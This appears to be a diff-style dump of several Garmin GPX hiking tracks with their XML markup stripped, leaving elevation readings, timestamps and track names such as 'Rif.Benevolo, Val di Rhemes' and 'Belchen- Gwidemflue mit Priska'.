+2018-04-21T13:04:21Z
+
+
+
+
+
+245.39999389648438
+2018-04-21T13:04:42Z
+
+
+
+
+
+257.20001220703125
+2018-04-21T13:04:56Z
+
+
+
+
+
+264.0
+2018-04-21T13:05:36Z
+
+
+
+
+
+296.0
+2018-04-21T13:07:00Z
+
+
+
+
+
+321.3999938964844
+2018-04-21T13:07:50Z
+
+
+
+
+
+340.3999938964844
+2018-04-21T13:08:42Z
+
+
+
+
+
+376.6000061035156
+2018-04-21T13:10:12Z
+
+
+
+
+
+466.0
+2018-04-21T13:14:32Z
+
+
+
+
+
+532.4000244140625
+2018-04-21T13:17:11Z
+
+
+
+
+
+553.7999877929688
+2018-04-21T13:18:08Z
+
+
+
+
+
+597.5999755859375
+2018-04-21T13:20:38Z
+
+
+
+
+
+685.2000122070312
+2018-04-21T13:24:16Z
+
+
+
+
+
+694.0
+2018-04-21T13:24:38Z
+
+
+
+
+
+721.7999877929688
+2018-04-21T13:26:23Z
+
+
+
+
+
+747.2000122070312
+2018-04-21T13:27:47Z
+
+
+
+
+
+757.4000244140625
+2018-04-21T13:28:37Z
+
+
+
+
+
+828.0
+2018-04-21T13:32:19Z
+
+
+
+
+
+840.4000244140625
+2018-04-21T13:32:50Z
+
+
+
+
+
+839.7999877929688
+2018-04-21T13:33:10Z
+
+
+
+
+
+871.2000122070312
+2018-04-21T13:35:10Z
+
+
+
+
+
+890.7999877929688
+2018-04-21T13:36:39Z
+
+
+
+
+
+901.2000122070312
+2018-04-21T13:37:00Z
+
+
+
+
+
+920.5999755859375
+2018-04-21T13:37:29Z
+
+
+
+
+
+917.5999755859375
+2018-04-21T13:37:54Z
+
+
+
+
+
+927.2000122070312
+2018-04-21T13:38:13Z
+
+
+
+
+
+925.4000244140625
+2018-04-21T13:38:27Z
+
+
+
+
+
+952.5999755859375
+2018-04-21T13:39:27Z
+
+
+
+
+
+961.0
+2018-04-21T13:40:35Z
+
+
+
+
+
+977.2000122070312
+2018-04-21T13:41:35Z
+
+
+
+
+
+1002.4000244140625
+2018-04-21T13:42:26Z
+
+
+
+
+
+1014.2000122070312
+2018-04-21T13:43:04Z
+
+
+
+
+
+1036.5999755859375
+2018-04-21T13:44:18Z
+
+
+
+ "
+"
+
+
+
+
+
+
+
+Trentapassi1
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-04-22T11:09:02Z
+
+2015-04-22 13:09:00
+
+
+
+
+
+
+458.84
+2015-04-22T06:13:15Z
+
+
+459.87
+2015-04-22T06:14:31Z
+
+
+471.72
+2015-04-22T06:15:57Z
+
+
+507.68
+2015-04-22T06:21:25Z
+
+
+529.14
+2015-04-22T06:23:24Z
+
+
+537.96
+2015-04-22T06:24:18Z
+
+
+584.51
+2015-04-22T06:28:41Z
+
+
+598.49
+2015-04-22T06:30:10Z
+
+
+607.56
+2015-04-22T06:32:27Z
+
+
+614.13
+2015-04-22T06:33:02Z
+
+
+626.27
+2015-04-22T06:34:11Z
+
+
+633.0
+2015-04-22T06:35:42Z
+
+
+675.9
+2015-04-22T06:39:46Z
+
+
+698.91
+2015-04-22T06:43:35Z
+
+
+702.18
+2015-04-22T06:44:56Z
+
+
+707.04
+2015-04-22T06:45:36Z
+
+
+723.63
+2015-04-22T06:47:32Z
+
+
+738.67
+2015-04-22T06:49:35Z
+
+
+751.58
+2015-04-22T06:51:08Z
+
+
+759.43
+2015-04-22T06:52:16Z
+
+
+790.74
+2015-04-22T06:55:56Z
+
+
+803.94
+2015-04-22T06:57:15Z
+
+
+827.01
+2015-04-22T06:59:37Z
+
+
+838.12
+2015-04-22T07:01:00Z
+
+
+843.24
+2015-04-22T07:01:31Z
+
+
+857.43
+2015-04-22T07:03:06Z
+
+
+864.38
+2015-04-22T07:04:01Z
+
+
+876.81
+2015-04-22T07:10:46Z
+
+
+885.33
+2015-04-22T07:12:15Z
+
+
+891.36
+2015-04-22T07:13:03Z
+
+
+894.3
+2015-04-22T07:13:44Z
+
+
+921.38
+2015-04-22T07:16:38Z
+
+
+945.16
+2015-04-22T07:19:32Z
+
+
+955.02
+2015-04-22T07:21:32Z
+
+
+969.54
+2015-04-22T07:23:20Z
+
+
+977.09
+2015-04-22T07:25:09Z
+
+
+1019.19
+2015-04-22T07:31:00Z
+
+
+1085.4
+2015-04-22T07:48:11Z
+
+
+1129.8
+2015-04-22T07:54:07Z
+
+
+1149.07
+2015-04-22T08:00:52Z
+
+
+1161.11
+2015-04-22T08:02:41Z
+
+
+1174.36
+2015-04-22T08:05:30Z
+
+
+1172.88
+2015-04-22T08:06:39Z
+
+
+1153.02
+2015-04-22T08:13:02Z
+
+
+1141.06
+2015-04-22T08:15:57Z
+
+
+1162.4
+2015-04-22T08:21:40Z
+
+
+1175.51
+2015-04-22T08:35:51Z
+
+
+1196.4
+2015-04-22T08:38:57Z
+
+
+1215.45
+2015-04-22T08:41:40Z
+
+
+1226.17
+2015-04-22T08:46:57Z
+
+
+1254.92
+2015-04-22T08:51:39Z
+
+
+1293.69
+2015-04-22T08:59:58Z
+
+
+1321.43
+2015-04-22T09:08:47Z
+
+
+1390.25
+2015-04-22T09:18:38Z
+
+
+1430.08
+2015-04-22T09:27:22Z
+
+
+1460.3
+2015-04-22T09:34:05Z
+
+
+1477.14
+2015-04-22T09:35:53Z
+
+
+1522.1
+2015-04-22T09:44:55Z
+
+
+1559.5
+2015-04-22T09:50:45Z
+
+
+1608.21
+2015-04-22T09:57:47Z
+
+
+1622.86
+2015-04-22T10:00:23Z
+
+
+1632.51
+2015-04-22T10:01:43Z
+
+
+1641.22
+2015-04-22T10:12:29Z
+
+
+1643.41
+2015-04-22T10:44:22Z
+
+
+1660.73
+2015-04-22T10:48:02Z
+
+
+1682.9
+2015-04-22T10:52:36Z
+
+
+1696.35
+2015-04-22T10:54:21Z
+
+
+1705.59
+2015-04-22T10:55:57Z
+
+
+1723.06
+2015-04-22T10:58:40Z
+
+
+1738.42
+2015-04-22T11:01:02Z
+
+
+1766.98
+2015-04-22T11:05:42Z
+
+
+1777.66
+2015-04-22T11:07:18Z
+
+
+1781.68
+2015-04-22T11:07:55Z
+
+
+1777.65
+2015-04-22T11:08:57Z
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-09-08T18:57:52Z
+
+
+2015-08-17 Rif.Benevolo, Val di Rhemes
+
+
+
+
+
+
+
+
+1834.78515625
+2015-08-17T08:31:27Z
+
+
+1848.1640625
+2015-08-17T08:32:37Z
+
+
+1841.87890625
+2015-08-17T08:36:24Z
+
+
+1866.94140625
+2015-08-17T08:41:42Z
+
+
+1883.0234375
+2015-08-17T08:44:44Z
+
+
+1884.4921875
+2015-08-17T08:46:42Z
+
+
+1908.56640625
+2015-08-17T08:49:12Z
+
+
+1911.9453125
+2015-08-17T08:50:39Z
+
+
+1919.87109375
+2015-08-17T08:51:58Z
+
+
+1930.44140625
+2015-08-17T08:55:37Z
+
+
+1943.23828125
+2015-08-17T09:04:16Z
+
+
+1955.12890625
+2015-08-17T09:06:45Z
+
+
+1962.51171875
+2015-08-17T09:10:13Z
+
+
+2004.75
+2015-08-17T09:18:23Z
+
+
+2035.82421875
+2015-08-17T09:25:20Z
+
+
+2027.97265625
+2015-08-17T09:26:56Z
+
+
+2033.7890625
+2015-08-17T09:29:35Z
+
+
+2032.3515625
+2015-08-17T09:31:09Z
+
+
+2028.66015625
+2015-08-17T09:32:26Z
+
+
+2032.625
+2015-08-17T09:36:43Z
+
+
+2037.80078125
+2015-08-17T09:39:18Z
+
+
+2034.890625
+2015-08-17T09:40:59Z
+
+
+2043.8046875
+2015-08-17T09:42:21Z
+
+
+2035.35546875
+2015-08-17T09:43:18Z
+
+
+2043.42578125
+2015-08-17T09:44:41Z
+
+
+2049.64453125
+2015-08-17T09:46:45Z
+
+
+2064.0546875
+2015-08-17T09:51:21Z
+
+
+2067.015625
+2015-08-17T09:55:00Z
+
+
+2085.8125
+2015-08-17T09:57:59Z
+
+
+2094.65234375
+2015-08-17T09:58:28Z
+
+
+2079.79296875
+2015-08-17T10:02:55Z
+
+
+2095.96484375
+2015-08-17T10:05:01Z
+
+
+2098.71484375
+2015-08-17T10:06:58Z
+
+
+2119.76953125
+2015-08-17T10:07:59Z
+
+
+2107.2265625
+2015-08-17T10:10:02Z
+
+
+2120.2265625
+2015-08-17T10:12:21Z
+
+
+2119.734375
+2015-08-17T10:14:32Z
+
+
+2105.4375
+2015-08-17T10:16:34Z
+
+
+2109.375
+2015-08-17T10:17:34Z
+
+
+2122.9140625
+2015-08-17T10:21:42Z
+
+
+2142.2578125
+2015-08-17T10:24:55Z
+
+
+2122.09375
+2015-08-17T10:30:20Z
+
+
+2125.078125
+2015-08-17T10:31:35Z
+
+
+2129.98046875
+2015-08-17T10:32:34Z
+
+
+2122.87890625
+2015-08-17T10:33:45Z
+
+
+2112.51953125
+2015-08-17T10:35:12Z
+
+
+2109.38671875
+2015-08-17T10:36:45Z
+
+
+2120.30859375
+2015-08-17T10:38:04Z
+
+
+2125.453125
+2015-08-17T10:44:14Z
+
+
+2119.71484375
+2015-08-17T10:50:49Z
+
+
+2128.33203125
+2015-08-17T10:53:26Z
+
+
+2138.3125
+2015-08-17T10:55:52Z
+
+
+2142.57421875
+2015-08-17T10:57:10Z
+
+
+2167.07421875
+2015-08-17T10:59:38Z
+
+
+2175.51953125
+2015-08-17T11:00:44Z
+
+
+2186.11328125
+2015-08-17T11:01:47Z
+
+
+2214.54296875
+2015-08-17T11:07:01Z
+
+
+2236.5625
+2015-08-17T11:14:30Z
+
+
+2250.36328125
+2015-08-17T11:16:43Z
+
+
+2251.671875
+2015-08-17T11:17:18Z
+
+
+2279.90234375
+2015-08-17T11:21:36Z
+
+
+2290.44140625
+2015-08-17T11:26:44Z
+
+
+2290.6953125
+2015-08-17T11:28:33Z
+
+
+2289.36328125
+2015-08-17T11:29:22Z
+
+
+2288.37109375
+2015-08-17T11:55:12Z
+ "
+"
+
+
+
+
+
+
+
+Montana Corona
+
+
+
+372.42
+2014-12-18T12:11:50Z
+
+
+374.958
+2014-12-18T12:13:18Z
+
+
+371.233
+2014-12-18T12:24:12Z
+
+
+370.064
+2014-12-18T12:24:31Z
+
+
+369.809
+2014-12-18T12:25:01Z
+
+
+369.558
+2014-12-18T12:25:31Z
+
+
+372.551
+2014-12-18T12:26:04Z
+
+
+375.967
+2014-12-18T12:26:32Z
+
+
+385.0
+2014-12-18T12:28:07Z
+
+
+390.209
+2014-12-18T12:30:47Z
+
+
+391.893
+2014-12-18T12:31:50Z
+
+
+397.286
+2014-12-18T12:35:16Z
+
+
+403.255
+2014-12-18T12:36:22Z
+
+
+407.643
+2014-12-18T12:38:09Z
+
+
+411.89
+2014-12-18T12:38:44Z
+
+
+415.843
+2014-12-18T12:39:52Z
+
+
+425.128
+2014-12-18T12:42:03Z
+
+
+457.516
+2014-12-18T12:48:28Z
+
+
+472.132
+2014-12-18T12:51:09Z
+
+
+475.655
+2014-12-18T12:53:42Z
+
+
+464.3
+2014-12-18T13:44:55Z
+
+
+420.79
+2014-12-18T13:55:01Z
+
+
+430.379
+2014-12-18T13:57:37Z
+
+
+423.594
+2014-12-18T13:58:17Z
+
+
+411.007
+2014-12-18T14:00:57Z
+
+
+412.102
+2014-12-18T14:02:11Z
+
+
+399.291
+2014-12-18T14:04:22Z
+
+
+392.113
+2014-12-18T14:08:59Z
+
+
+396.0
+2014-12-18T14:11:37Z
+
+
+385.9
+2014-12-18T14:14:19Z
+
+
+374.176
+2014-12-18T14:17:42Z
+
+
+370.174
+2014-12-18T14:18:15Z
+
+
+353.323
+2014-12-18T14:20:54Z
+
+
+345.837
+2014-12-18T14:22:32Z
+
+
+352.426
+2014-12-18T14:23:14Z
+
+
+364.586
+2014-12-18T14:26:40Z
+
+
+369.306
+2014-12-18T14:29:33Z
+
+
+362.017
+2014-12-18T14:32:29Z
+
+
+361.286
+2014-12-18T14:38:10Z
+
+
+384.374
+2014-12-18T14:42:09Z
+
+
+382.781
+2014-12-18T14:45:50Z
+
+
+385.894
+2014-12-18T14:48:16Z
+
+
+382.528
+2014-12-18T14:49:12Z
+
+
+387.811
+2014-12-18T14:54:20Z
+
+
+382.967
+2014-12-18T14:55:17Z
+
+
+379.173
+2014-12-18T14:58:38Z
+
+
+408.28
+2014-12-18T15:04:39Z
+
+
+411.02
+2014-12-18T15:05:08Z
+
+
+408.693
+2014-12-18T15:06:17Z
+
+
+415.718
+2014-12-18T15:07:45Z
+
+
+423.756
+2014-12-18T15:10:04Z
+
+
+429.817
+2014-12-18T15:11:14Z
+
+
+435.373
+2014-12-18T15:13:05Z
+
+
+437.976
+2014-12-18T15:17:41Z
+
+
+439.796
+2014-12-18T15:18:40Z
+
+
+442.004
+2014-12-18T15:30:48Z
+
+
+436.55
+2014-12-18T15:31:52Z
+
+
+426.723
+2014-12-18T15:38:37Z
+
+
+422.771
+2014-12-18T15:41:45Z
+
+
+412.137
+2014-12-18T15:43:31Z
+
+
+406.442
+2014-12-18T15:45:04Z
+
+
+404.759
+2014-12-18T15:46:18Z
+
+
+394.49
+2014-12-18T15:56:02Z
+
+
+391.526
+2014-12-18T15:56:24Z
+
+
+390.358
+2014-12-18T15:57:31Z
+
+
+385.172
+2014-12-18T16:03:00Z
+
+
+384.168
+2014-12-18T16:04:11Z
+
+
+395.314
+2014-12-18T16:06:27Z
+
+
+394.999
+2014-12-18T16:07:30Z
+
+
+392.849
+2014-12-18T16:09:42Z
+
+
+371.439
+2014-12-18T16:12:55Z
+
+
+364.866
+2014-12-18T16:13:50Z
+
+
+365.157
+2014-12-18T16:14:50Z
+
+
+371.541
+2014-12-18T16:19:30Z
+
+
+372.987
+2014-12-18T16:21:12Z
+
+
+369.059
+2014-12-18T16:23:45Z
+
+
+369.948
+2014-12-18T16:28:04Z
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+
+
+
+
+Garmin International
+2016-11-29T16:14:19Z
+
+
+161129-mm-wand-6600m-170HM
+
+
+
+
+
+
+354.8
+
+
+357.9
+
+
+362.2
+
+
+360.2
+
+
+360.2
+
+
+352.8
+
+
+351.8
+
+
+356.1
+
+
+359.3
+
+
+352.2
+
+
+352.7
+
+
+351.7
+
+
+350.2
+
+
+350.3
+
+
+344.5
+
+
+337.1
+
+
+327.1
+
+
+318.5
+
+
+307.9
+
+
+307.1
+
+
+315.9
+
+
+309.9
+
+
+318.7
+
+
+329.6
+
+
+340.2
+
+
+331.4
+
+
+326.5
+
+
+334.1
+
+
+320.6
+
+
+318.5
+
+
+319.8
+
+
+317.7
+
+
+319.1
+
+
+317.7
+
+
+319.8
+
+
+318.5
+
+
+320.6
+
+
+334.1
+
+
+326.5
+
+
+331.4
+
+
+340.2
+
+
+329.6
+
+
+318.7
+
+
+309.9
+
+
+315.9
+
+
+307.1
+
+
+307.9
+
+
+318.5
+
+
+327.1
+
+
+337.1
+
+
+344.5
+
+
+350.3
+
+
+350.2
+
+
+351.7
+
+
+352.7
+
+
+352.2
+
+
+359.3
+
+
+356.1
+
+
+351.8
+
+
+352.8
+
+
+360.2
+
+
+360.2
+
+
+362.2
+
+
+357.9
+
+
+354.8
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-06-02T19:16:41Z
+
+2015-06-02 21:16:39
+
+
+
+
+
+
+1143.73
+2015-06-02T13:51:08Z
+
+
+1151.49
+2015-06-02T13:52:50Z
+
+
+1163.34
+2015-06-02T13:54:02Z
+
+
+1175.27
+2015-06-02T13:55:16Z
+
+
+1185.56
+2015-06-02T13:56:58Z
+
+
+1216.14
+2015-06-02T14:00:13Z
+
+
+1229.16
+2015-06-02T14:01:45Z
+
+
+1264.15
+2015-06-02T14:04:06Z
+
+
+1310.57
+2015-06-02T14:07:50Z
+
+
+1344.29
+2015-06-02T14:10:10Z
+
+
+1371.54
+2015-06-02T14:12:13Z
+
+
+1399.19
+2015-06-02T14:14:14Z
+
+
+1411.03
+2015-06-02T14:18:34Z
+
+
+1437.16
+2015-06-02T14:20:52Z
+
+
+1470.11
+2015-06-02T14:23:07Z
+
+
+1494.92
+2015-06-02T14:25:05Z
+
+
+1549.67
+2015-06-02T14:29:49Z
+
+
+1600.4
+2015-06-02T14:34:30Z
+
+
+1627.88
+2015-06-02T14:36:44Z
+
+
+1638.99
+2015-06-02T14:48:03Z
+
+
+1649.94
+2015-06-02T14:50:12Z
+
+
+1667.83
+2015-06-02T14:51:48Z
+
+
+1689.25
+2015-06-02T14:54:45Z
+
+
+1708.41
+2015-06-02T14:56:46Z
+
+
+1737.52
+2015-06-02T15:01:12Z
+
+
+1758.9
+2015-06-02T15:03:18Z
+
+
+1765.96
+2015-06-02T15:05:23Z
+
+
+1791.28
+2015-06-02T15:07:55Z
+
+
+1810.1
+2015-06-02T15:19:23Z
+
+
+1794.68
+2015-06-02T15:21:09Z
+
+
+1771.56
+2015-06-02T15:23:20Z
+
+
+1780.33
+2015-06-02T15:25:53Z
+
+
+1805.01
+2015-06-02T15:29:19Z
+
+
+1813.85
+2015-06-02T15:31:45Z
+
+
+1824.08
+2015-06-02T15:35:37Z
+
+
+1825.56
+2015-06-02T16:11:39Z
+
+
+1861.18
+2015-06-02T16:14:54Z
+
+
+1882.1
+2015-06-02T16:18:45Z
+
+
+1913.63
+2015-06-02T16:21:27Z
+
+
+1948.67
+2015-06-02T16:30:58Z
+
+
+1967.98
+2015-06-02T16:34:29Z
+
+
+2015.16
+2015-06-02T16:56:34Z
+
+
+2038.85
+2015-06-02T17:04:10Z
+
+
+2025.32
+2015-06-02T17:38:26Z
+
+
+1970.93
+2015-06-02T17:51:57Z
+
+
+1944.24
+2015-06-02T17:55:04Z
+
+
+1901.48
+2015-06-02T17:59:31Z
+
+
+1839.93
+2015-06-02T18:04:49Z
+
+
+1805.41
+2015-06-02T18:07:47Z
+
+
+1772.56
+2015-06-02T18:10:20Z
+
+
+1706.58
+2015-06-02T18:16:47Z
+
+
+1656.37
+2015-06-02T18:22:05Z
+
+
+1639.15
+2015-06-02T18:24:22Z
+
+
+1628.84
+2015-06-02T18:38:59Z
+
+
+1601.28
+2015-06-02T18:41:29Z
+
+
+1546.68
+2015-06-02T18:45:08Z
+
+
+1489.71
+2015-06-02T18:51:08Z
+
+
+1427.33
+2015-06-02T18:54:20Z
+
+
+1398.4
+2015-06-02T18:56:06Z
+
+
+1361.5
+2015-06-02T18:58:13Z
+
+
+1332.59
+2015-06-02T18:59:44Z
+
+
+1265.27
+2015-06-02T19:03:28Z
+
+
+1214.36
+2015-06-02T19:07:41Z
+
+
+1200.14
+2015-06-02T19:09:21Z
+
+
+1186.28
+2015-06-02T19:10:30Z
+
+
+1173.85
+2015-06-02T19:11:48Z
+
+
+1162.7
+2015-06-02T19:13:00Z
+
+
+1150.84
+2015-06-02T19:14:05Z
+
+
+1140.74
+2015-06-02T19:15:30Z
+
+
+1136.34
+2015-06-02T19:16:08Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-12-05T15:06:03Z
+
+
+2015-12-04 14:09:52
+
+
+
+
+
+
+1176.79
+2015-12-04T09:01:31Z
+
+
+1211.4
+2015-12-04T09:07:00Z
+
+
+1236.87
+2015-12-04T09:09:34Z
+
+
+1253.7
+2015-12-04T09:11:16Z
+
+
+1270.04
+2015-12-04T09:12:42Z
+
+
+1273.4
+2015-12-04T09:13:08Z
+
+
+1284.94
+2015-12-04T09:14:17Z
+
+
+1342.14
+2015-12-04T09:21:01Z
+
+
+1365.69
+2015-12-04T09:23:16Z
+
+
+1380.59
+2015-12-04T09:25:07Z
+
+
+1393.57
+2015-12-04T09:26:57Z
+
+
+1400.78
+2015-12-04T09:28:24Z
+
+
+1416.16
+2015-12-04T09:30:01Z
+
+
+1421.93
+2015-12-04T09:31:18Z
+
+
+1428.66
+2015-12-04T09:36:45Z
+
+
+1432.98
+2015-12-04T09:38:12Z
+
+
+1448.84
+2015-12-04T09:42:09Z
+
+
+1458.94
+2015-12-04T09:43:26Z
+
+
+1579.1
+2015-12-04T09:57:47Z
+
+
+1610.35
+2015-12-04T10:01:55Z
+
+
+1635.34
+2015-12-04T10:05:08Z
+
+
+1662.26
+2015-12-04T10:08:29Z
+
+
+1692.06
+2015-12-04T10:13:38Z
+
+
+1708.88
+2015-12-04T10:17:00Z
+
+
+1712.73
+2015-12-04T10:18:32Z
+
+
+1718.97
+2015-12-04T10:31:16Z
+
+
+1712.25
+2015-12-04T11:19:33Z
+
+
+1708.88
+2015-12-04T11:19:55Z
+
+
+1690.62
+2015-12-04T11:21:37Z
+
+
+1671.87
+2015-12-04T11:24:29Z
+
+
+1668.51
+2015-12-04T11:26:33Z
+
+
+1662.26
+2015-12-04T11:28:45Z
+
+
+1662.26
+2015-12-04T11:31:30Z
+
+
+1631.98
+2015-12-04T11:36:38Z
+
+
+1623.32
+2015-12-04T11:45:58Z
+
+
+1614.67
+2015-12-04T12:04:08Z
+
+
+1614.67
+2015-12-04T12:05:32Z
+
+
+1596.41
+2015-12-04T12:08:16Z
+
+
+1565.16
+2015-12-04T12:11:25Z
+
+
+1555.07
+2015-12-04T12:12:20Z
+
+
+1548.82
+2015-12-04T12:13:09Z
+
+
+1525.27
+2015-12-04T12:15:19Z
+
+
+1489.7
+2015-12-04T12:18:36Z
+
+
+1477.2
+2015-12-04T12:21:58Z
+
+
+1470.47
+2015-12-04T12:23:10Z
+
+
+1454.13
+2015-12-04T12:26:06Z
+
+
+1448.84
+2015-12-04T12:27:10Z
+
+
+1430.1
+2015-12-04T12:29:32Z
+
+
+1419.04
+2015-12-04T12:30:53Z
+
+
+1408.47
+2015-12-04T12:32:06Z
+
+
+1388.28
+2015-12-04T12:33:55Z
+
+
+1345.98
+2015-12-04T12:38:44Z
+
+
+1319.07
+2015-12-04T12:41:30Z
+
+
+1271.96
+2015-12-04T12:46:25Z
+
+
+1258.5
+2015-12-04T12:47:40Z
+
+
+1245.53
+2015-12-04T12:49:45Z
+
+
+1230.62
+2015-12-04T12:51:41Z
+
+
+1212.36
+2015-12-04T12:53:20Z
+
+
+1202.27
+2015-12-04T12:57:06Z
+
+
+1178.71
+2015-12-04T13:01:05Z
+
+
+1167.18
+2015-12-04T13:02:32Z
+
+
+1157.56
+2015-12-04T13:03:15Z
+
+
+1129.69
+2015-12-04T13:05:47Z
+
+
+1112.86
+2015-12-04T13:07:06Z
+
+
+1102.77
+2015-12-04T13:08:00Z
+
+
+1097.48
+2015-12-04T13:09:32Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-06-30T07:48:14Z
+
+2015-06-30 09:48:13
+
+
+
+
+
+
+894.53
+2015-06-30T06:55:23Z
+
+
+921.75
+2015-06-30T06:58:26Z
+
+
+951.44
+2015-06-30T07:01:02Z
+
+
+973.67
+2015-06-30T07:03:28Z
+
+
+1026.04
+2015-06-30T07:07:47Z
+
+
+1043.78
+2015-06-30T07:09:05Z
+
+
+1051.16
+2015-06-30T07:10:14Z
+
+
+1074.25
+2015-06-30T07:12:46Z
+
+
+1093.73
+2015-06-30T07:14:12Z
+
+
+1137.27
+2015-06-30T07:17:52Z
+
+
+1174.16
+2015-06-30T07:21:56Z
+
+
+1180.01
+2015-06-30T07:23:13Z
+
+
+1198.21
+2015-06-30T07:25:01Z
+
+
+1225.71
+2015-06-30T07:27:08Z
+
+
+1247.17
+2015-06-30T07:29:01Z
+
+
+1370.07
+2015-06-30T07:38:43Z
+
+
+1399.61
+2015-06-30T07:41:08Z
+
+
+1416.16
+2015-06-30T07:43:58Z
+
+
+1442.96
+2015-06-30T07:48:05Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2014-08-25T13:43:01Z
+
+2014-08-25 15:43:00
+
+
+
+
+
+
+1072.72
+2014-08-25T12:41:28Z
+
+
+1060.89
+2014-08-25T12:43:25Z
+
+
+1051.25
+2014-08-25T12:44:39Z
+
+
+1042.18
+2014-08-25T12:45:36Z
+
+
+1029.0
+2014-08-25T12:47:20Z
+
+
+1029.54
+2014-08-25T12:47:41Z
+
+
+1029.74
+2014-08-25T12:48:12Z
+
+
+1026.93
+2014-08-25T12:49:12Z
+
+
+1025.05
+2014-08-25T12:50:58Z
+
+
+1030.78
+2014-08-25T12:53:58Z
+
+
+1072.33
+2014-08-25T12:58:55Z
+
+
+1077.55
+2014-08-25T12:59:40Z
+
+
+1082.04
+2014-08-25T13:01:22Z
+
+
+1085.85
+2014-08-25T13:02:08Z
+
+
+1089.9
+2014-08-25T13:02:51Z
+
+
+1097.36
+2014-08-25T13:06:14Z
+
+
+1110.58
+2014-08-25T13:07:40Z
+
+
+1132.36
+2014-08-25T13:10:28Z
+
+
+1147.36
+2014-08-25T13:12:58Z
+
+
+1154.76
+2014-08-25T13:14:54Z
+
+
+1155.63
+2014-08-25T13:16:27Z
+
+
+1167.34
+2014-08-25T13:18:22Z
+
+
+1176.95
+2014-08-25T13:20:08Z
+
+
+1231.32
+2014-08-25T13:26:15Z
+
+
+1243.24
+2014-08-25T13:27:50Z
+
+
+1255.37
+2014-08-25T13:29:30Z
+
+
+1282.28
+2014-08-25T13:33:49Z
+
+
+1299.78
+2014-08-25T13:36:03Z
+
+
+1321.82
+2014-08-25T13:38:28Z
+
+
+1329.98
+2014-08-25T13:39:31Z
+
+
+1328.31
+2014-08-25T13:39:59Z
+
+
+1321.58
+2014-08-25T13:42:28Z
+
+
+1320.91
+2014-08-25T13:42:59Z
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+
+
+
+
+Garmin International
+2017-03-10T17:29:32Z
+
+
+2017-03-10 15:56:38
+
+
+
+
+
+
+732.66
+2017-03-10T13:15:25Z
+
+
+731.22
+2017-03-10T13:19:11Z
+
+
+731.7
+2017-03-10T13:19:39Z
+
+
+733.14
+2017-03-10T13:20:42Z
+
+
+736.03
+2017-03-10T13:22:25Z
+
+
+741.31
+2017-03-10T13:24:11Z
+
+
+742.28
+2017-03-10T13:24:28Z
+
+
+749.97
+2017-03-10T13:26:57Z
+
+
+754.77
+2017-03-10T13:33:00Z
+
+
+757.18
+2017-03-10T13:34:01Z
+
+
+762.46
+2017-03-10T13:38:05Z
+
+
+761.5
+2017-03-10T13:42:20Z
+
+
+759.1
+2017-03-10T13:43:49Z
+
+
+759.58
+2017-03-10T13:44:44Z
+
+
+757.66
+2017-03-10T13:45:22Z
+
+
+751.41
+2017-03-10T13:46:32Z
+
+
+741.31
+2017-03-10T13:50:15Z
+
+
+730.26
+2017-03-10T13:53:03Z
+
+
+721.13
+2017-03-10T13:55:43Z
+
+
+719.2
+2017-03-10T13:56:12Z
+
+
+718.24
+2017-03-10T13:56:33Z
+
+
+713.44
+2017-03-10T13:58:35Z
+
+
+708.63
+2017-03-10T14:00:01Z
+
+
+699.5
+2017-03-10T14:02:52Z
+
+
+689.88
+2017-03-10T14:05:22Z
+
+
+679.31
+2017-03-10T14:07:38Z
+
+
+673.06
+2017-03-10T14:09:36Z
+
+
+680.27
+2017-03-10T14:15:47Z
+
+
+682.19
+2017-03-10T14:17:20Z
+
+
+682.19
+2017-03-10T14:18:23Z
+
+
+682.19
+2017-03-10T14:18:57Z
+
+
+682.67
+2017-03-10T14:20:16Z
+
+
+682.67
+2017-03-10T14:21:06Z
+
+
+682.67
+2017-03-10T14:22:47Z
+
+
+679.79
+2017-03-10T14:23:49Z
+
+
+685.56
+2017-03-10T14:29:15Z
+
+
+687.96
+2017-03-10T14:30:43Z
+
+
+698.05
+2017-03-10T14:34:13Z
+
+
+700.94
+2017-03-10T14:37:25Z
+
+
+709.11
+2017-03-10T14:40:06Z
+
+
+715.36
+2017-03-10T14:41:37Z
+
+
+721.61
+2017-03-10T14:43:00Z
+
+
+727.37
+2017-03-10T14:44:17Z
+
+
+745.64
+2017-03-10T14:48:05Z
+
+
+725.45
+2017-03-10T14:52:11Z
+
+
+721.61
+2017-03-10T14:52:55Z
+
+
+721.61
+2017-03-10T14:56:25Z
+ "
+"
+
+
+Belchen- Gwidemflue mit Priska
+
+
+
+
+
+
+
+
+
+853.1
+
+
+853.4999965048013
+
+
+870.1999750969404
+
+
+885.5000071773612
+
+
+892.1999695128795
+
+
+896.5
+
+
+901.9999179407597
+
+
+944.70009898309
+
+
+954.2000251372474
+
+
+959.2999902147641
+
+
+971.7999771691403
+
+
+976.699998380738
+
+
+972.6000157846543
+
+
+974.2000004684518
+
+
+970.3999736768285
+
+
+981.1999668153021
+
+
+987.7999754915759
+
+
+992.0999908533182
+
+
+1001.1999884882297
+
+
+960.7
+
+
+997.0000319783877
+
+
+1026.8
+
+
+1032.4998832140318
+
+
+1045.8999861043926
+
+
+1055.4999688944877
+
+
+1062.0999001009627
+
+
+1068.7
+
+
+1080.5242306641198
+
+
+1092.2
+
+
